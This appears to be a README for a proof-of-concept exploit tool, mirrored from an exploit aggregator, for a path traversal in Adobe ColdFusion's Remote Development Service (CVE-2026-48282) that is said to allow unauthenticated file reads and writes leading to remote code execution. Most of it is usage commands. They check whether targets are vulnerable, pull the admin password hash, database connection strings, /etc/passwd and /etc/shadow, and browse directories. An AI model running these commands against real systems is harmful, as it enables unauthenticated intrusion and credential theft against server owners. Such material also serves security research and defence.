Share
## https://sploitus.com/exploit?id=E61ECA10-8CD1-5D13-AC33-66B7D37853AB
# CVE-2026-48282-POC

**CVE-2026-48282** is a **path traversal** vulnerability in **Adobe ColdFusion's Remote Development Service (RDS)** with a CVSS score of **10.0 (Critical)**. It allows unauthenticated attackers to read & write arbitrary files via the `/CFIDE/main/ide.cfm` endpoint, leading to **Remote Code Execution (RCE)**.

## Installation

```bash
# Clone the repository
git clone https://github.com//CVE-2026-48282.git
cd CVE-2026-48282

# Install dependencies (only requires `requests`)
pip install -r requirements.txt
```
# Usage

### Step 1 โ€” Check if a target is vulnerable

```bash
python cve-2026-48282.py -t http://target.com --check
```

```
### Step 2 โ€” Read sensitive files

Once confirmed vulnerable, extract credentials and configuration:

```bash
# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

# Save output to a file
python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini
```
### Step 3 โ€” Browse directories

```bash
# List root directory
python cve-2026-48282.py -t http://target.com --browse "C:\\"

```